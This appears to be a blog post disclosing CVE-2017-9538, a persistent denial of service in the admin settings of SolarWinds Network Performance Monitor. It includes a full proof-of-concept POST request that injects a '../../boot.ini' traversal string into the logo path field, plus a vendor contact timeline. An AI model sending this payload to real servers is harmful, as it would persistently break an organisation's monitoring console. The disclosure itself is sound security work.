Vulnerability : isehlt : [CVE-2017-9538] Persistent Application Denial of Service

------------------------------------------------------------- Vulnerability type: Persistent Application Denial of Service ------------------------------------------------------------- Credit: Andy Tan CVE ID: CVE-2017-9538 ----------------------------------------------- Product: SolarWinds Network Performance Monitor ----------------------------------------------- Affected version: SolarWinds Network Performance Monitor version 12.0.15300.90 and possibly earlier Hotfix: SolarWinds Orion Platform 2017.3 Hotfix 1 Description: An attacker has to inject an arbitrary payload e.g. ../../../boot.ini into the vulnerable field. After successful submission, the entire web application will encounter an error message displaying 'Unexpected Website Error, Cannot use a leading .. to exit above the top directory'. In other words, the denial of service is caused by an incorrect implementation of a directory-traversal protection mechanism. Restarting the service and the entire server itself does not resolve this issue. Affected URL: https:///Orion/Admin/Settings.aspx Navigation: Settings -> Web Console Settings -> Site Logo -> Upload logo from external path Affected parameter: ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$logoPath ================ Proof of Concept ================ POST /Orion/Admin/Settings.aspx HTTP/1.1 -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="__AntiXsrfTokenInput" b752b8b9beec4c46ab90559cfcd2bc01 -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00_ctl00_ctl00_BodyContent_ContentPlaceHolder1_adminContentPlaceholder_fileUploadImage_ClientState" -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="__EVENTTARGET" ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$imgbtnSubmit -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="__EVENTARGUMENT" -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00_ctl00_ctl00_BodyContent_ContentPlaceHolder1_adminContentPlaceholder_fileUploadImageNoc_ClientState" -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="__VIEWSTATE" /wEPDwUJNzUxMTg4OTYyDxYCHhNWYWxpZGF0ZVJlcXVlc3RNb2RlAgEWAmYPZBYCZg9kFgJmDw8WBB4PX19BbnRpWHNyZlRva2VuBSBiNzUyYjhiOWJlZWM0YzQ2YWI5MDU1OWNmY2QyYmMwMR4SX19BbnRpWHNyZlVzZXJOYW1lBQZhZG1pbjFkFgICBA9kFgICAQ9kFgICBA8WBB4FY2xhc3MFDnN3LWFwcC1yZWdpb24gHgdlbmN0eXBlBRNtdWx0aXBhcnQvZm9ybS1kYXRhFgICBQ9kFgICAQ9kFjYCAg8PFgQeCENzc0NsYXNzBRYgc3ctYnRuLXByaW1hcnkgc3ctYnRuHgRfIVNCAgIWAh4KYXV0b21hdGlvbgUWRG93bmxvYWQgaW5zdGFsbGVyIG5vd2QCBBAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCBRAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCBhAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCCRAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCChAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCDA8WAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7FgYCAQ9kFgICAQ9kFgJmDxYEHgJpZAVfY3RsMDBfY3RsMDBfY3RsMDBfQm9keUNvbnRlbnRfQ29udGVudFBsYWNlSG9sZGVyMV9hZG1pbkNvbnRlbnRQbGFjZWhvbGRlcl9maWxlVXBsb2FkSW1hZ2VfY3RsMDIfCAUMd2lkdGg6MzU1cHg7ZAICDw8WBB8FBSN4LWZvcm0tZmlsZS1idG4gc3ctYnRuLXNtYWxsIHN3LWJ0bh8GAgIWAh8HBQZCcm93c2VkAgQQDxYEHwUFE3N3LXZhbGlkYXRpb24tZX Jyb3IfBgICZGRkAg4PFgIfCAUOZGlzcGxheTpibG9jazsWAgIFEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIQDxYCHwgFDmRpc3BsYXk6YmxvY2s7FgYCAQ9kFgICAQ9kFgJmDxYEHwkFYmN0bDAwX2N0bDAwX2N0bDAwX0JvZHlDb250ZW50X0NvbnRlbnRQbGFjZUhvbGRlcjFfYWRtaW5Db250ZW50UGxhY2Vob2xkZXJfZmlsZVVwbG9hZEltYWdlTm9jX2N0bDAyHwgFDHdpZHRoOjM1NXB4O2QCAg8PFgQfBQUjeC1mb3JtLWZpbGUtYnRuIHN3LWJ0bi1zbWFsbCBzdy1idG4fBgICFgIfBwUGQnJvd3NlZAIEEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAISDxYCHwgFDmRpc3BsYXk6YmxvY2s7FgICBRAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCFBAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCFhAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCGA8QZBAVAxFTaG93IFdvcnN0IFN0YXR1cyNTaG93IFdvcnN0IFN0YXR1cyAoSW50ZXJmYWNlcyBvbmx5KRVTaG93IG9ubHkgSUNNUCBTdGF0dXMVAwEqFE9yaW9uLk5QTS5JbnRlcmZhY2VzABQrAwNnZ2dkZAIZDxYCHgRUZXh0Bb4BV2hlbiBzaG93aW5nIHRoZSBzdGF0dXMgb2YgYW55IHNpbmdsZSBub2RlIG9uIHRoZSBub2RlIHRyZWUgb3Igb24gYSBtYXAsPGJyIC8+eW91IGNhbiBzaG93IHRoZSBzdGF0dXMgb2YgdGhlIG5vZGUgYW5kIGl0cyBjaGlsZHJlbiwgbm9kZSBzdGF0dXMgYW5 kIGludGVyZmFjZXMsPGJyIC8+b3IganVzdCBub2RlIElDTVAgc3RhdHVzLmQ! CHA8WAh8 KBVJQcm92aWRlIGlubGluZSBoaW50cyBmb3IgaW50ZWdyYXRpbmcgeW91ciBjdXJyZW50bHkgaW5zdGFsbGVkIFNvbGFyV2luZHMgcHJvZHVjdHMuZAIgEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIhEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIjEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIkEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAImEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAInEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIpEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIqEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIrEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIxEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIyEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIzDw8WBh8KBQZTdWJtaXQfBQUWIHN3LWJ0bi1wcmltYXJ5IHN3LWJ0bh8GAgIWAh8HBQZTdWJtaXRkGAMFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYKBVBjdGwwMCRjdGwwMCRjdGwwMCRCb2R5Q29udGVudCRDb250ZW50UGxhY2VIb2xkZXIxJGFkbWluQ29udGVudFBsYWNlaG9sZGVyJGxvZ29DYgVZY3RsMDAkY3RsMDAkY3RsMDAkQm9keUNvbnRlbnQkQ29udGVudFBsYWNlSG9sZGVyMSRhZG1pbkNvbnRlbnRQbGFjZWhvbGRlciRmaWxlVXBsb 2FkSW1hZ2UFV2N0bDAwJGN0bDAwJGN0bDAwJEJvZHlDb250ZW50JENvbnRlbnRQbGFjZUhvbGRlcjEkYWRtaW5Db250ZW50UGxhY2Vob2xkZXIkbG9nb0Zyb21VcmxDYgVTY3RsMDAkY3RsMDAkY3RsMDAkQm9keUNvbnRlbnQkQ29udGVudFBsYWNlSG9sZGVyMSRhZG1pbkNvbnRlbnRQbGFjZWhvbGRlciRub2NMb2dvQ2IFXGN0bDAwJGN0bDAwJGN0bDAwJEJvZHlDb250ZW50JENvbnRlbnRQbGFjZUhvbGRlcjEkYWRtaW5Db250ZW50UGxhY2Vob2xkZXIkZmlsZVVwbG9hZEltYWdlTm9jBVpjdGwwMCRjdGwwMCRjdGwwMCRCb2R5Q29udGVudCRDb250ZW50UGxhY2VIb2xkZXIxJGFkbWluQ29udGVudFBsYWNlaG9sZGVyJG5vY0xvZ29Gcm9tVXJsQ2IFWmN0bDAwJGN0bDAwJGN0bDAwJEJvZHlDb250ZW50JENvbnRlbnRQbGFjZUhvbGRlcjEkYWRtaW5Db250ZW50UGxhY2Vob2xkZXIkY2JBdWRpdGluZ1RyYWlscwViY3RsMDAkY3RsMDAkY3RsMDAkQm9keUNvbnRlbnQkQ29udGVudFBsYWNlSG9sZGVyMSRhZG1pbkNvbnRlbnRQbGFjZWhvbGRlciRjaGJTaG93RGF0YVBvaW50c09uTGluZXMFW2N0bDAwJGN0bDAwJGN0bDAwJEJvZHlDb250ZW50JENvbnRlbnRQbGFjZUhvbGRlcjEkYWRtaW5Db250ZW50UGxhY2Vob2xkZXIkY2JOb3RpZnlSZW1vdmFibGUFYGN0bDAwJGN0bDAwJGN0bDAwJEJvZHlDb250ZW50JENvbnRlbnRQbGFjZUhvbGRlcjEkYWRtaW5Db250ZW50UGxhY2Vob2xkZXIkY2JBdXRvbWF0aWNHZW 9sb2NhdGlvbgUuY3RsMDAkY3RsMDAkY3RsMDAkQm9keUNvbnRlbnQkY3RsMD! AkTG9naW 5WaWV3MQ8PZAIBZAUuY3RsMDAkY3RsMDAkY3RsMDAkQm9keUNvbnRlbnQkY3RsMDAkTG9naW5WaWV3Mg8PZAIBZBC54iMHZwWuUrSOCyy3YhYFyEN1 -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="__VIEWSTATEGENERATOR" 8442CAB0 -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbSessionTimeout" 25 -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlWindowsAccountLogin" False -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbAutoRefresh" 5 -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$logoCb" on -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$fileUploadImage$ctl00" -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$fileUploadImage$ctl02"; filename="" Content-Type: application/octet-stream -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$logoFromUrlCb" on -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$logoPath" ./../../boot.ini -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$nocLogoCb" on -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$fileUploadImageNoc$ctl00" -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$fileUploadImageNoc$ctl02"; filename="" Content-Type: application/octet-stream -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$nocLogoPath" -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbSiteLoginText" -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbHelpServer" http://www.SolarWinds.com -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlRollupWorstStatus" False -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlNodeChildStatusParticipationRule" * -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlNodeChildStatusDisplayMode" NoBlink -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlTipsIntegration" 1 -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$cbDragAndDropResources" 1 -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$cbAuditingTrails" on -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbChartAspect" 0.620000004768372 -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbThumbnailAspect" 0.600000023841858 -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbPercentile" 95 -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbMaximumSeries" 10 -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$chbShowDataPointsOnLines" on -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlFontSize" 1 -----------------------------180072296016649028841705926975 Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbAutoRefreshActiveAlerts" 1 -----------------------------180072296016649028841705926975-- ------------------------ Vendor contact timeline: ------------------------ 2017-06-12: Contacted vendor. 2017-06-23: Vendor responded that bug jury completed and vulnerability is assigned to vNext milestone. 2017-08-22: Contacted vendor again. 2017-08-23: Vendor responded that hotfix will be released for all products shipping on Orion Core 2017.3 2017-09-28: Contacted vendor again. 2017-09-28: Vendor responded that the vulnerability is addressed in the recently released Hotfix for Core 2017.3 2017-09-29: Public disclosure.

Vulnerability : isehlt

2017 m. spalio 5 d., ketvirtadienis

[CVE-2017-9538] Persistent Application Denial of Service

Komentarų nėra:

Rašyti komentarą

Tinklaraščio archyvas

Translate

Ieškoti šiame dienoraštyje

Populiarūs įrašai